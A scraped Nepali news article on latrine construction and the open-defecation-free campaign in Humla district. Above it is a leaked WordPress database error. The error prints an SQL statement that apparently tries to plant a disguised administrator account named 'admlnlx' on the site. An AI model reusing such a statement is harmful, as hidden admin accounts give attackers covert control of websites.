WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHBCfQkaC0gVvm9D7mmkl4s0TkeDMp1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-07 12:42:16', '', 'admlnlx', 'admlnlx')

हुम्लामा चर्पीका लागि एक करोड खर्च – Gaule Khabar

हुम्लामा चर्पीका लागि एक करोड खर्च

हुम्लामा चर्पीका लागि एक करोड खर्च

कर्ण बहादुर रोकाया, हुम्ला ।। खुला दिसामुक्त अभियानको यात्रासँगै हुम्लामा हालसम्म करीब १० हजार चर्पी निर्माण भएका छन् । यसबाट मानवीय तथा वातावरणीय रुपमा सुधार देखिएको छ ।

हुम्लामा २०६८ मंसिर १७ गतेका दिनमा जिल्लाको पहिलो खुला दिसामुक्त गाविस श्रीमष्ठालाई घोषणा गरिएको हो भने पछिल्लो २०७३ मंसिर २६ गते मुचुलाई घोषणा गरिएको छ । अब जिल्लामा श्रीनगर र डाँडाफया गाविस मात्र बाँकी रहेको जानकारी जिल्ला खानेपानी तथा सरसफाइ सबडिभिजन प्रमुख ज्वालाराज शाहीले दिनु भएको छ ।

हुम्लामा व्यवस्थित चर्पी बनाउँदा चर्पीका लागि चाहिने विभिन्न प्रकारका साधनहरु जस्तै ः सिमेन्ट, पाइप, जस्ता, प्यान सेट लगायतका सामाग्रीहरु गाउँघरमा पाउन मुस्किल भएकाले सम्बन्धीत गाविसमा काम गर्ने गैससहरु र जिल्ला खानेपानी तथा सरसफाइ सबडिभिजन कार्यालय हुम्लाले महंगोमा ल्याएर घर घरमा दिने गरेको छ । स्थानीयस्तरमा पाइने काठ र ढुंगाको मेला पनि बढ्दै जाँदा  हुम्लामा साधारण किसिमको चर्पी बनाउन ५० हजारदेखि ३ लाखसम्म पर्ने गरेको वास्तविकता ग्रामीण जलस्रोत व्यवस्थापन हुम्लाका प्रमुख विरेन्द्र थापाको अनुभव रहेको छ ।

हालसम्म हुम्ला जिल्लाका २७ गाविसहरुमध्ये सबभन्दा पहिलो खुला दिसामुक्त गाविस घोषणा श्रीमष्ठा गाविस भएको हो भने हालसम्म पछिल्लो खुला दिसामुक्त गाविस मुचु रहेको छ । जसलाई २०७३ साल मंसिर २६ गते भएको हो ।

२७ गाविसमध्ये सबभन्दा कम १ सय ५७ बरगाउँ गाविसमा रहेको छ भने सबभन्दा धेरै चर्पी सिमकोट गाविसमा १ हजार १४ चर्पी निर्माण भएका छन् । जिल्लामा निर्माण भएका चर्पीको लागत मुल्य लेखाजोखा गर्दा करीब ५० करोड लगानी भएको देखिन्छ । यसमा १५ प्रतिशत गाविस, जिविस, विभिन्न गैेससहरु र जिल्ला खानेपानी तथा सरसफाइ सबडिभिजन कार्यालय हुम्लाको रहेको छ भने ८५ प्रतिशत लगानी स्थानीयहरुको रहेको पाइन्छ ।

हुम्ला जिल्लाको धेरै राजनीतिक दलका नेताहरु भएका गाविसहरुमा श्रीनगर र डाँडाफया भए पनि राजनीतिक खिचातानी तथा एक आपसमा मेल पनि नभएका कारण यी दुई गाविसहरुमा चर्पी निर्माण गर्न समस्या परेको जानकारी सरोकारवालाहरुले गरेका छन् ।

बाहिरबाट विकासे कार्यकर्ता जाँदा र विभिन्न प्रकारका उपभोक्ताहरुका लागि तानतान गर्ने यी दुई गाविसका मानिसहरुलाई सामाजिक काममा लगाउन गाह्रो भएको पनि यो चर्पी अभियानले देखाएको छ ।

२०७३ चैत्रसम्म जिल्लालाई खुला दिसामुक्त घोषणा गर्ने काममा यी दुई गाविसले गर्दा पछि पारेको छ ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका